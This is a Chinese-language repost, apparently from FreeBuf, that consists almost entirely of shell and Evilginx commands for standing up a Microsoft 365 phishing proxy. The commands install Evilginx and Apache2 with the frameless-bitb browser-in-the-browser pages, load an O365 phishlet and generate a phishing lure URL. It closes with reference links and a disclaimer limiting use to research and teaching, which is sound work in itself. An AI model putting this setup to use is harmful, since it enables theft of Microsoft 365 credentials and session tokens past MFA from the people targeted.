虚拟机VM Go Evilginx Apache2 Phishlet Lure
Evilginx配置
wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz
nano ~/.profile
source ~/.profile
export PATH=$PATH:/usr/local/go/bin
go version
sudo apt install make
cd /home/evilginx/evilginx2
make
mkdir /home/evilginx/evilginx
cp /home/evilginx/evilginx2/build/evilginx /home/evilginx/evilginx/evilginx
cp -r /home/evilginx/evilginx2/redirectors /home/evilginx/evilginx/redirectors
cp -r /home/evilginx/evilginx2/phishlets /home/evilginx/evilginx/phishlets
sudo setcap CAP_NET_BIND_SERVICE=+eip /home/evilginx/evilginx/evilginx
sudo nano /etc/systemd/resolved.conf
sudo systemctl restart systemd-resolved
nano ~/.evilginx/config.json
安装Apache2并启用Mods
sudo apt install apache2 -y
sudo a2enmod proxy
sudo a2enmod proxy_http
sudo a2enmod proxy_balancer
sudo a2enmod lbmethod_byrequests
sudo a2enmod env
sudo a2enmod include
sudo a2enmod setenvif
sudo a2enmod ssl
sudo a2ensite default-ssl
sudo a2enmod cache
sudo a2enmod substitute
sudo a2enmod headers
sudo a2enmod rewrite
sudo a2dismod access_compat
sudo systemctl start apache2
sudo systemctl enable apache2
sudo apt -y install git
git clone https://github.com/waelmas/frameless-bitb
cd frameless-bitb
sudo mkdir /var/www/home
sudo mkdir /var/www/primary
sudo mkdir /var/www/secondary
sudo cp -r ./pages/home/ /var/www/
sudo cp -r ./pages/primary/ /var/www/
sudo cp -r ./pages/secondary/ /var/www/
sudo rm -r /var/www/html/
sudo cp ./O365.yaml /home/evilginx/evilginx/phishlets/O365.yaml
sudo apt install tmux -y
tmux new-session -s evilginx
cd ~/evilginx/
./evilginx -developer
config domain fake.com
config ipv4 127.0.0.1
blacklist noadd
phishlets hostname O365 fake.com
phishlets enable O365
lures create O365
lures get-url 0
https://github.com/mrd0x/BITB https://academy.breakdev.org/evilginx-mastery https://www.jackphilipbutton.com/post/how-to-protect-evilginx-using-cloudflare-and-html-obfuscation https://janbakker.tech/evilginx-resources-for-microsoft-365/
原文始发于微信公众号(FreeBuf):Frameless BITB:一款功能强大的BitB安全测试工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论